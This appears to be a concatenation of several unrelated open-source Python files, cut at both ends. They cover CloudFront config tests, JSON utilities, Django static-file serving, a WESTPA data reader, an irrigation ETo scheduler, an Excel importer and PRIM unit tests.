error_page_path=error_page_path,
acm_cert_arn=acm_cert_arn,
minimum_protocol_version=minimum_protocol_version,
ssl_support_method=ssl_support_method
)
return cf_distribution_config
def create_s3_origin(domain_name='amazonia-elb-bucket.s3.amazonaws.com', origin_id='S3-bucket-id',
is_s3=True, origin_access_identity='originaccessid1'):
"""
Create an S3Origin object
:param domain_name: The DNS name of the S3 bucket or HTTP server which this distribution will point to
:param origin_id: An identifier for this origin (must be unique within this distribution)
:param is_s3: Boolean value indicating whether the object is an S3Origin or a CustomOrigin
:param origin_access_identity: The Cloudfront origin access identity to associate with the origin
:return: Instance of S3Origin object
"""
origin = CFOriginsConfig(
domain_name=domain_name,
origin_id=origin_id,
origin_path='',
custom_headers={
'Origin': 'http://www.domain.com',
'Accept': 'True'
},
origin_policy={
'is_s3': is_s3,
'origin_access_identity': origin_access_identity
}
)
return origin
def create_custom_origin(domain_name='amazonia-elb-bucket.s3.amazonaws.com',
origin_id='S3-bucket-id',
is_s3=False,
origin_protocol_policy='https-only',
http_port='80',
https_port='443',
origin_ssl_protocols=['TLSv1', 'TLSv1.1', 'TLSv1.2']):
"""
Create a CustomOrigin object
:param domain_name: The DNS name of the S3 bucket or HTTP server which this distribution will point to
:param origin_id: An identifier for this origin (must be unique within this distribution)
:param is_s3: Boolean value indicating whether the object is an S3Origin or a CustomOrigin
:param origin_protocol_policy: Which protocols the origin listens on (http, https, both)
:param http_port: The HTTP port the origin listens on
:param https_port: The HTTPS port the origin listens on
:param origin_ssl_protocols: The SSL protocols to be used when establishing an HTTPS connection with the origin
:return: Instance of CustomOrigin object
"""
origin = CFOriginsConfig(
domain_name=domain_name,
origin_id=origin_id,
origin_path='/path',
custom_headers={},
origin_policy={
'is_s3': is_s3,
'origin_protocol_policy': origin_protocol_policy,
'http_port': http_port,
'https_port': https_port,
'origin_ssl_protocols': origin_ssl_protocols,
}
)
return origin
def create_cache_behavior(is_default=False,
path_pattern='/index.html',
allowed_methods=['GET', 'POST'],
cached_methods=['GET', 'POST'],
target_origin_id='S3-bucket-id',
forward_cookies='all',
forwarded_headers=['Accept', 'Set-Cookie'],
viewer_protocol_policy='allow-all',
min_ttl=0,
default_ttl=0,
max_ttl=0,
trusted_signers=['self'],
query_string=True):
"""
:param path_pattern: The pattern to which this cache behavior applies
:param allowed_methods: List of HTTP methods that can be passed to the origin
:param cached_methods: List of HTTP methods for which Cloudfront caches responses
:param target_origin_id: Value of the unique ID for the default cache behavior of this distribution
:param viewer_protocol_policy: The protocol that users can use to access origin files
:param min_ttl: The minimum amount of time objects should stay in the cache
:param default_ttl: The default amount of time objects stay in the cache
:param max_ttl: The maximum amount of time objects should stay in the cache
:param forward_cookies: boolean to forward cookies to origin
:param forwarded_headers: list of headers to forward to origin
:param trusted_signers: list of identifies that are trusted to sign cookies on behalf of this behavior
:param query_string: indicates whether to forward query strings to the origin
:return: Instance of CacheBehavior object
"""
cache_behavior = CFCacheBehaviorConfig(
is_default=is_default,
path_pattern=path_pattern,
allowed_methods=allowed_methods,
cached_methods=cached_methods,
target_origin_id=target_origin_id,
forward_cookies=forward_cookies,
forwarded_headers=forwarded_headers,
viewer_protocol_policy=viewer_protocol_policy,
min_ttl=min_ttl,
default_ttl=default_ttl,
max_ttl=max_ttl,
trusted_signers=trusted_signers,
query_string=query_string
)
return cache_behavior
def test_s3_origin():
"""
Test to check S3Origin object inputs match the created outputs
"""
domain_name = 'www.domain.com'
is_s3 = True
origin_access_identity = 'origin-access-identity/cloudfront/TestOAI'
helper_cf_origin = create_s3_origin(domain_name=domain_name,
is_s3=is_s3,
origin_access_identity=origin_access_identity
)
assert_equal(domain_name, helper_cf_origin.domain_name)
assert_equal(is_s3, helper_cf_origin.origin_policy['is_s3'])
assert_equal(origin_access_identity, helper_cf_origin.origin_access_identity)
def test_s3_origin_oai():
"""
Test to check S3Origin object inputs match the created outputs
"""
domain_name = 'www.domain.com'
is_s3 = True
origin_access_identity = 'TestOAI'
helper_cf_origin = create_s3_origin(domain_name=domain_name,
is_s3=is_s3,
origin_access_identity=origin_access_identity
)
assert_equal(domain_name, helper_cf_origin.domain_name)
assert_equal(is_s3, helper_cf_origin.origin_policy['is_s3'])
assert_equal(origin_access_identity, helper_cf_origin.origin_access_identity)
def test_custom_origin():
"""
Test to check CustomOrigin object inputs match the created outputs
"""
domain_name = 'www.domain.com'
is_s3 = False
origin_protocol_policy = 'https-only'
http_port = '80'
https_port = '443'
origin_ssl_protocols = ['TLSv1', 'TLSv1.1', 'TLSv1.2']
helper_cf_origin = create_custom_origin(domain_name=domain_name,
is_s3=is_s3,
origin_protocol_policy=origin_protocol_policy,
http_port=http_port,
https_port=https_port,
origin_ssl_protocols=origin_ssl_protocols
)
assert_equal(domain_name, helper_cf_origin.domain_name)
assert_equal(is_s3, helper_cf_origin.origin_policy['is_s3'])
assert_equal(origin_protocol_policy, helper_cf_origin.origin_protocol_policy)
assert_equal(http_port, helper_cf_origin.http_port)
assert_equal(https_port, helper_cf_origin.https_port)
assert_equal(origin_ssl_protocols, helper_cf_origin.origin_ssl_protocols)
def test_cf_cache_behavior():
"""
Test to check CacheBehavior object inputs match the created outputs
"""
is_default = False
path_pattern = '/index.html'
allowed_methods = ['GET', 'POST']
cached_methods = ['GET', 'POST'],
target_origin_id = 'S3-bucket-id'
forward_cookies = 'all'
forwarded_headers = ['Accept', 'Set-Cookie']
viewer_protocol_policy = 'allow-all'
min_ttl = 0
default_ttl = 0
max_ttl = 0
trusted_signers = ['self']
query_string = True
helper_cf_cache_behavior = create_cache_behavior(is_default=is_default,
path_pattern=path_pattern,
allowed_methods=allowed_methods,
cached_methods=cached_methods,
target_origin_id=target_origin_id,
forward_cookies=forward_cookies,
forwarded_headers=forwarded_headers,
viewer_protocol_policy=viewer_protocol_policy,
min_ttl=min_ttl,
default_ttl=default_ttl,
max_ttl=max_ttl,
trusted_signers=trusted_signers,
query_string=query_string)
assert_equal(is_default, helper_cf_cache_behavior.is_default)
assert_equal(path_pattern, helper_cf_cache_behavior.path_pattern)
assert_equal(allowed_methods, helper_cf_cache_behavior.allowed_methods)
assert_equal(cached_methods, helper_cf_cache_behavior.cached_methods)
assert_equal(target_origin_id, helper_cf_cache_behavior.target_origin_id)
assert_equal(forward_cookies, helper_cf_cache_behavior.forward_cookies)
assert_equal(forwarded_headers, helper_cf_cache_behavior.forwarded_headers)
assert_equal(min_ttl, helper_cf_cache_behavior.min_ttl)
assert_equal(default_ttl, helper_cf_cache_behavior.default_ttl)
assert_equal(max_ttl, helper_cf_cache_behavior.max_ttl)
assert_equal(trusted_signers, helper_cf_cache_behavior.trusted_signers)
assert_equal(query_string, helper_cf_cache_behavior.query_string)
def test_cf_distribution_config():
"""
Test to check DistributionConfig object inputs match the created outputs
"""
aliases = ['wwwelb.ap-southeast-2.elb.amazonaws.com']
comment = 'UnitTestCFDistConfig'
default_root_object = 'index.html'
enabled = True
price_class = 'PriceClass_All'
error_page_path = 'index.html'
acm_cert_arn = 'arn:aws:acm:us-east-1:123456789012:certificate/12345678-abcd-efgh-1234-abcd12345678'
minimum_protocol_version = 'TLSv1'
ssl_support_method = 'sni-only'
cf_dist_config = create_cf_distribution_config(aliases=aliases,
comment=comment,
default_root_object=default_root_object,
enabled=enabled,
price_class=price_class,
error_page_path=error_page_path,
acm_cert_arn=acm_cert_arn,
minimum_protocol_version=minimum_protocol_version,
ssl_support_method=ssl_support_method)
assert_equal(aliases, cf_dist_config.aliases)
assert_equal(comment, cf_dist_config.comment)
assert_equal(default_root_object, cf_dist_config.default_root_object)
assert_equal(enabled, cf_dist_config.enabled)
assert_equal(price_class, cf_dist_config.price_class)
assert_equal(acm_cert_arn, cf_dist_config.acm_cert_arn)
assert_equal(error_page_path, cf_dist_config.error_page_path)
def test_cf_distribution_unit():
"""
Test CF distribution unit structure
"""
network_config, template = get_network_config()
cf_dist_config = create_cf_distribution_config()
origins = [create_s3_origin(), create_s3_origin()]
default_behaviour = create_cache_behavior()
default_behaviour.is_default = True
cache_behaviors = [default_behaviour, create_cache_behavior()]
unit_title = 'testcf'
cf_dist_unit = CFDistributionUnit(unit_title=unit_title,
cf_distribution_config=cf_dist_config,
stack_config=network_config,
cf_origins_config=origins,
cf_cache_behavior_config=cache_behaviors,
template=template)
assert_equals(cf_dist_unit.title, unit_title)
def test_cf_distribution_tree():
"""
Test CF distribution leaf structure
"""
network_config, template = get_network_config()
cf_dist_config = create_cf_distribution_config()
origins = [create_s3_origin(), create_s3_origin()]
default_behaviour = create_cache_behavior()
default_behaviour.is_default = True
cache_behaviors = [default_behaviour, create_cache_behavior()]
leaf_title = 'testcf'
tree_name = 'testtree'
cf_dist_unit = CFDistributionLeaf(leaf_title=leaf_title,
cf_distribution_config=cf_dist_config,
tree_name=tree_name,
cf_origins_config=origins,
cf_cache_behavior_config=cache_behaviors,
template=template)
assert_equals(cf_dist_unit.title, leaf_title)
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2011, 2012 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""JSON utilities."""
from __future__ import absolute_import
import json
CFG_JSON_AVAILABLE = True
import re
import six
def json_unicode_to_utf8(data):
"""Change all strings in a JSON structure to UTF-8."""
if type(data) == unicode:
return data.encode('utf-8')
elif type(data) == dict:
newdict = {}
for key in data:
newdict[json_unicode_to_utf8(key)] = json_unicode_to_utf8(data[key])
return newdict
elif type(data) == list:
return [json_unicode_to_utf8(elem) for elem in data]
else:
return data
def json_decode_file(filename):
"""
Parses a textfile using json to build a python object representation
"""
seq = open(filename).read()
## The JSON standard has no comments syntax. We have to remove them
## before feeding python's JSON parser
seq = json_remove_comments(seq)
## Parse all the unicode stuff to utf-8
return json_unicode_to_utf8(json.loads(seq))
def json_remove_comments(text):
""" Removes C style comments from the given string. Will keep newline
characters intact. This way parsing errors from json will point to the
right line.
This is primarily used to make comments in JSON files possible.
The JSON standard has no comments syntax, but we want to use
JSON for our profiles and configuration files. The comments need to be
removed first, before the text can be feed to the JSON parser of python.
@param text: JSON string that should be cleaned
@type text: string
@return: Cleaned JSON
@rtype: string
"""
def replacer(match):
s = match.group(0)
if s.startswith('/'):
return ""
else:
return s
pattern = re.compile(
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE
)
return re.sub(pattern, replacer, text)
def wash_for_js(text):
"""
DEPRECATED: use htmlutils.escape_javascript_string() instead,
and take note that returned value is no longer enclosed into
quotes.
"""
from invenio.utils.html import escape_javascript_string
if isinstance(text, six.string_types):
return '"%s"' % escape_javascript_string(text,
escape_for_html=False,
escape_CDATA=False,
escape_script_tag_with_quote=None)
else:
return text
|
"""
Views and functions for serving static files. These are only to be used
during development, and SHOULD NOT be used in a production setting.
"""
import mimetypes
import os
import posixpath
import re
import stat
from django.http import (
FileResponse, Http404, HttpResponse, HttpResponseNotModified,
HttpResponseRedirect,
)
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.http import http_date, parse_http_date
from django.utils.translation import gettext as _, gettext_lazy
def serve(request, path, document_root=None, show_indexes=False):
"""
Serve static files below a given point in the directory structure.
To use, put a URL pattern such as::
from django.views.static import serve
url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'})
in your URLconf. You must provide the ``document_root`` param. You may
also set ``show_indexes`` to ``True`` if you'd like to serve a basic index
of the directory. This index view will use the template hardcoded below,
but if you'd like to override it, you can create a template called
``static/directory_index.html``.
"""
path = posixpath.normpath(path)
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404(_("Directory indexes are not allowed here."))
if not os.path.exists(fullpath):
raise Http404(_('"%(path)s" does not exist') % {'path': fullpath})
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj.st_mtime, statobj.st_size):
return HttpResponseNotModified()
content_type, encoding = mimetypes.guess_type(fullpath)
content_type = content_type or 'application/octet-stream'
response = FileResponse(open(fullpath, 'rb'), content_type=content_type)
response["Last-Modified"] = http_date(statobj.st_mtime)
if stat.S_ISREG(statobj.st_mode):
response["Content-Length"] = statobj.st_size
if encoding:
response["Content-Encoding"] = encoding
return response
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
{% load i18n %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title>
</head>
<body>
<h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1>
<ul>
{% if directory != "/" %}
<li><a href="../">../</a></li>
{% endif %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
template_translatable = gettext_lazy("Index of %(directory)s")
def directory_index(path, fullpath):
try:
t = loader.select_template([
'static/directory_index.html',
'static/directory_index',
])
except TemplateDoesNotExist:
t = Engine(libraries={'i18n': 'django.templatetags.i18n'}).from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE)
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory': path + '/',
'file_list': files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_mtime = parse_http_date(matches.group(1))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if int(mtime) > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
|
# Copyright (C) 2013 Matthew C. Zwier and Lillian T. Chong
#
# This file is part of WESTPA.
#
# WESTPA is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WESTPA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WESTPA. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function; __metaclass__ = type
import numpy
from numpy import index_exp
from core import WESTToolComponent
import westpa
from westpa.extloader import get_object
from westpa.h5io import FnDSSpec, MultiDSSpec, SingleSegmentDSSpec, SingleIterDSSpec
def _get_parent_ids(n_iter, iter_group):
seg_index = iter_group['seg_index']
try:
return seg_index['parent_id'][:]
except ValueError:
# field not found
offsets = seg_index['parents_offset'][:]
all_parents = iter_group['parents'][...]
return numpy.require(all_parents.take(offsets),dtype=numpy.int64)
else:
return seg_index['parent_id']
class WESTDataReader(WESTToolComponent):
'''Tool for reading data from WEST-related HDF5 files. Coordinates finding
the main HDF5 file from west.cfg or command line arguments, caching of certain
kinds of data (eventually), and retrieving auxiliary data sets from various
places.'''
def __init__(self):
super(WESTDataReader,self).__init__()
self.data_manager = westpa.rc.get_data_manager()
self.we_h5filename = None
self._weight_dsspec = None
self._parent_id_dsspec = None
def add_args(self, parser):
group = parser.add_argument_group('WEST input data options')
group.add_argument('-W', '--west-data', dest='we_h5filename', metavar='WEST_H5FILE',
help='''Take WEST data from WEST_H5FILE (default: read from the HDF5 file specified in west.cfg).''')
def process_args(self, args):
if args.we_h5filename:
self.data_manager.we_h5filename = self.we_h5filename = args.we_h5filename
else:
self.we_h5filename = self.data_manager.we_h5filename
def open(self, mode='r'):
self.data_manager.open_backing(mode)
def close(self):
self.data_manager.close_backing()
def __getattr__(self, key):
return getattr(self.data_manager, key)
@property
def weight_dsspec(self):
if self._weight_dsspec is None:
assert self.we_h5filename is not None
self._weight_dsspec = SingleIterDSSpec(self.we_h5filename, 'seg_index', slice=index_exp['weight'])
return self._weight_dsspec
@property
def parent_id_dsspec(self):
if self._parent_id_dsspec is None:
assert self.we_h5filename is not None
#self._parent_id_dsspec = SingleIterDSSpec(self.we_h5filename, 'seg_index', slice=index_exp['parent_id'])
self._parent_id_dsspec = FnDSSpec(self.we_h5filename, _get_parent_ids)
return self._parent_id_dsspec
def __enter__(self):
self.open('r')
return self
def __exit__(self, exc_type, exc_val, exc_traceback):
self.close()
return False
class WESTDSSynthesizer(WESTToolComponent):
'''Tool for synthesizing a dataset for analysis from other datasets. This
may be done using a custom function, or a list of "data set specifications".
It is anticipated that if several source datasets are required, then a tool
will have multiple instances of this class.'''
group_name = 'input dataset options'
def __init__(self, default_dsname = None, h5filename=None):
super(WESTDSSynthesizer,self).__init__()
self.h5filename = h5filename
self.default_dsname = default_dsname
self.dsspec = None
def add_args(self, parser):
igroup = parser.add_argument_group(self.group_name).add_mutually_exclusive_group(required=not bool(self.default_dsname))
igroup.add_argument('--construct-dataset',
help='''Use the given function (as in module.function) to extract source data.
This function will be called once per iteration as function(n_iter, iter_group)
to construct data for one iteration. Data returned must be indexable as
[seg_id][timepoint][dimension]''')
igroup.add_argument('--dsspecs', nargs='+', metavar='DSSPEC',
help='''Construct source data from one or more DSSPECs.''')
def process_args(self, args):
if args.construct_dataset:
self.dsspec = FnDSSpec(self.h5filename, get_object(args.construct_dataset,path=['.']))
elif args.dsspecs:
self.dsspec = MultiDSSpec([SingleSegmentDSSpec.from_string(dsspec, self.h5filename)
for dsspec in args.dsspecs])
else:
# we can only get here if a default dataset name was specified
assert self.default_dsname
self.dsspec = SingleSegmentDSSpec(self.h5filename, self.default_dsname)
|
# external control
import datetime
import time
import string
import urllib2
import math
import redis
import base64
import json
import eto
import py_cf
import os
#import sys # Need to have acces to sys.stdout
#fd = open('/media/mmc1/python/eto_debug.out.debug','a+') # open
#old_stdout = sys.stdout # store the default system handler to be able to restore it
#sys.stdout = fd # Now your file is used by print as destination
#fd.write( "this is a debug print \n"3)
#fd.write( "this is a debug print \n" )
class Eto_Management():
def __init__(self, redis ):
self.redis = redis
self.sites = sites = [ "MSRUC1", #SANTA ROSA PLATEAU CA US, Temecula, CA
"MECSC1", #EL CARISO CA US, Lake Elsinore, CA
"MCSPC1" #CSS CASE SPRINGS CA US, Murrieta, CA
]
self.alt = 2400
def calculate_daily_eto( self, chainFlowHandle, chainObj, parameters, event ):
print datetime.datetime.now()
print("calculating yesterday eto")
eto_data = eto.determine_yesterday_eto(self.redis, self.sites, self.alt)
print("eto_data",eto_data)
#self.redis.set("YESTERDAY_ETO", eto_data )
#if int(self.redis.get("YESTERDAY_UPDATE_FLAG")) == 1 :
self.redis.set("YESTERDAY_ETO", eto_data )
self.update_sprinklers_time_bins( eto_data )
#self.redis.set("YESTERDAY_UPDATE_FLAG",0)
self.store_event_queue( "store_eto", eto_data)
def update_sprinklers_time_bins( self, yesterday_eto ):
list_string = self.redis.get( "ETO_RESOURCE_LIST" )
list_data = string.split(list_string,":")
for j in list_data:
try:
temp = self.redis.get( j )
temp = float(temp)
except:
temp = 0
temp = temp + yesterday_eto
if temp > .3 :
temp = .3
self.redis.set( j, temp )
def store_event_queue( self, event, data ):
log_data = {}
log_data["event"] = event
log_data["data"] = data
log_data["time"] = time.time()
json_data = json.dumps(log_data)
json_data = base64.b64encode(json_data)
self.redis.lpush( "cloud_event_queue", json_data)
self.redis.ltrim( "cloud_event_queue", 0,800)
def calculate_current_eto( self, chainFlowHandle, chainObj, parameters, event ):
print( "calculating eto \n")
try:
eto_data = eto.calculate_current_eto( self.sites, self.alt)
print( "current eto",(eto_data["net_et"],"\n"))
self.store_event_queue( "store_eto", eto_data )
self.redis.set("CURRENT_ETO", eto_data["net_et"] )
self.redis.set("CURRENT_ETO_DATA",eto_data)
print("updating eto \n")
except:
fd.write("exception in calculating eto \n")
self.redis.set("CURRENT_ETO", 0 )
self.redis.set("CURRENT_WIND_GUST", 0)
self.redis.set("CURRENT_WIND_GUST_TIME_STAMP", 0)
self.redis.set("CURRENT_ETO_DATA", 0)
self.store_event_queue( "store_eto_exception", eto_data["net_et"] )
def do_house_keeping( self, chainFlowHandle, chainObj, parameters, event ):
pass
#self.redis.set( "YESTERDAY_UPDATE_FLAG", 1 )
def delete_email_files( self,chainFlowHandle, chainOjb, parameters, event ):
print( str(datetime.datetime.now())+"\n")
print("deleteing emails \n")
eto.delete_email()
def restart( self,chainFlowHandle, chainOjb, parameters, event ):
pass
class Ntpd():
def __init__( self ):
pass
def get_time( self, chainFlowHandle, chainObj, parameters, event ):
os.system("ntpdate -b -s -u pool.ntp.org")
class Watch_Dog_Client():
def __init__(self, redis, directory, key, description ):
self.redis = redis
self.directory = directory
self.key = key
self.description = description
self.redis.hset(directory,key,None)
self.pat_wd( None, None, None, None)
def pat_wd( self, chainFlowHandle, chainObj, parameters, event ):
self.redis.delete( self.key )
temp = {}
temp["time"] = time.time()
temp["max_dt"] = 5*60
temp["pid"] = os.getpid()
temp["description"] = self.description
self.redis.set( self.key, json.dumps(temp) )
if __name__ == "__main__":
redis = redis.StrictRedis( host = "127.1.1.1", port=6379, db = 0 )
etm = Eto_Management( redis )
#etm.calculate_daily_eto( None,None,None,None)
print( "made it here on startup")
#etm.calculate_daily_eto( None,None,None,None)
#etm.delete_email_files( None, None, None, None )
ntpd = Ntpd()
device_directory = "WD_DIRECTORY"
wc = Watch_Dog_Client(redis, device_directory,"extern_ctrl","external control")
wc.pat_wd( None, None, None, None )
#
# Adding chains
#
cf = py_cf.CF_Interpreter()
#
# ETO processing elements
#
# cf.define_chain( "master_sequencer", True ) ## auto start thread
# cf.insert_link( "link_3", "Enable_Chain",[["new_day_house_keeping","get_current_eto","delete_cimis_email_data" ]])
# cf.insert_link( "link_4","Disable_Chain",[["master_sequencer"]])
cf.define_chain("get_current_eto",True)
cf.insert_link( "link_1", "WaitTod", ["*",12, "*","*" ] )
cf.insert_link( "link_2", "One_Step", [etm.calculate_daily_eto ] )
cf.insert_link( "link_3", "WaitTod", ["*",13,"*","*" ] )
cf.insert_link( "link_4", "Reset", [] )
cf.define_chain("delete_cimis_email_data",True)
cf.insert_link( "link_1","WaitTod",["*",14,"*","*" ])
cf.insert_link( "link_2","One_Step",[etm.delete_email_files])
cf.insert_link( "link_3","WaitTod",["*",15,"*","*" ])
cf.insert_link( "link_4","Reset",[])
# cf.define_chain("new_day_house_keeping",False)
# cf.insert_link( "link_1","WaitTod",["*",12,"*","*" ])
# cf.insert_link( "link_2","One_Step",[etm.do_house_keeping])
# cf.insert_link( "link_3","WaitTod",["*",13,"*","*" ])
# cf.insert_link( "link_4","Reset",[])
#
# cf.define_chain("get_current_eto",False)
# cf.insert_link( "link_1", "WaitTod", ["*",12, 20,"*" ] )
# cf.insert_link( "link_2", "One_Step", [etm.calculate_current_eto ] )
# cf.insert_link( "link_3", "One_Step", [etm.calculate_daily_eto ] )
# cf.insert_link( "link_4", "WaitTod", ["*",13,50,"*" ] )
# cf.insert_link( "link_5", "Reset", [] )
#
#
#
# internet time update
#
#
cf.define_chain("ntpd",True)
cf.insert_link( "link_9","Log",["ntpd"] )
cf.insert_link( "link_1", "One_Step", [ntpd.get_time] )
cf.insert_link( "link_10", "Log",["got time"] )
cf.insert_link( "link_2", "WaitEvent",[ "HOUR_TICK" ] )
cf.insert_link( "link_3", "Reset",[] )
#
#
# update clocks from internet
#
#
cf.define_chain("watch_dog_thread",True)
cf.insert_link( "link_1","WaitTod",["*","*","*",30 ])
cf.insert_link( "link_2","One_Step",[ wc.pat_wd ])
cf.insert_link( "link_3","WaitTod",["*","*","*",55 ])
cf.insert_link( "link_4","Reset",[])
#
# Executing chains
#
cf_environ = py_cf.Execute_Cf_Environment( cf )
cf_environ.execute()
|
from corehq.util.spreadsheets.excel import WorkbookJSONReader
from soil import DownloadBase
class UnknownFileRefException(Exception):
pass
class ExcelImporter(object):
"""
Base class for `SingleExcelImporter` and `MultiExcelImporter`.
This is not meant to be used directly.
"""
def __init__(self, task, file_ref_id):
self.task = task
self.progress = 0
if self.task:
DownloadBase.set_progress(self.task, 0, 100)
download_ref = DownloadBase.get(file_ref_id)
if download_ref is None:
raise UnknownFileRefException("Could not find file wih ref %s. It may have expired" % file_ref_id)
self.workbook = WorkbookJSONReader(download_ref.get_filename())
def mark_complete(self):
if self.task:
DownloadBase.set_progress(self.task, 100, 100)
def add_progress(self, count=1):
self.progress += count
if self.task:
DownloadBase.set_progress(self.task, self.progress, self.total_rows)
class SingleExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with only one
worksheet.
"""
def __init__(self, task, file_ref_id):
super(SingleExcelImporter, self).__init__(task, file_ref_id)
self.worksheet = self.workbook.worksheets[0]
self.total_rows = self.worksheet.worksheet.get_highest_row()
class MultiExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with multiple
relevant worksheets.
"""
def __init__(self, task, file_ref_id):
super(MultiExcelImporter, self).__init__(task, file_ref_id)
self.worksheets = self.workbook.worksheets
self.total_rows = sum(ws.worksheet.get_highest_row() for ws in self.worksheets)
|
'''
Created on Mar 13, 2012
.. codeauthor:: jhkwakkel <j.h.kwakkel (at) tudelft (dot) nl>
'''
import unittest
import numpy as np
import pandas as pd
from ema_workbench.analysis import prim
from ema_workbench.analysis.prim import PrimBox
from test import utilities
from ema_workbench.analysis.scenario_discovery_util import RuleInductionType
def flu_classify(data):
#get the output for deceased population
result = data['deceased population region 1']
#make an empty array of length equal to number of cases
classes = np.zeros(result.shape[0])
#if deceased population is higher then 1.000.000 people, classify as 1
classes[result[:, -1] > 1000000] = 1
return classes
def scarcity_classify(outcomes):
outcome = outcomes['relative market price']
change = np.abs(outcome[:, 1::]-outcome[:, 0:-1])
neg_change = np.min(change, axis=1)
pos_change = np.max(change, axis=1)
logical = (neg_change > -0.6) & (pos_change > 0.6)
classes = np.zeros(outcome.shape[0])
classes[logical] = 1
return classes
class PrimBoxTestCase(unittest.TestCase):
def test_init(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([0,1,2])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
self.assertEqual(box.peeling_trajectory.shape, (1,6))
def test_select(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([1,1,0])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
box.select(0)
self.assertTrue(np.all(box.yi==prim_obj.yi))
def test_inspect(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = np.array([1,1,0])
prim_obj = prim.Prim(x, y, threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
box.inspect(1)
box.inspect()
box.inspect(style='graph')
with self.assertRaises(ValueError):
box.inspect(style='some unknown style')
def test_show_ppt(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = np.array([1,1,0])
prim_obj = prim.Prim(x, y, threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
cols = ['mean', 'mass', 'coverage', 'density', 'res_dim']
data = np.zeros((100, 5))
data[:, 0:4] = np.random.rand(100, 4)
data[:, 4] = np.random.randint(0, 5, size=(100, ))
box.peeling_trajectory = pd.DataFrame(data, columns=cols)
box.show_ppt()
def test_show_tradeoff(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = np.array([1,1,0])
prim_obj = prim.Prim(x, y, threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
cols = ['mean', 'mass', 'coverage', 'density', 'res_dim']
data = np.zeros((100, 5))
data[:, 0:4] = np.random.rand(100, 4)
data[:, 4] = np.random.randint(0, 5, size=(100, ))
box.peeling_trajectory = pd.DataFrame(data, columns=cols)
box.show_tradeoff()
def test_update(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([1,1,0])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
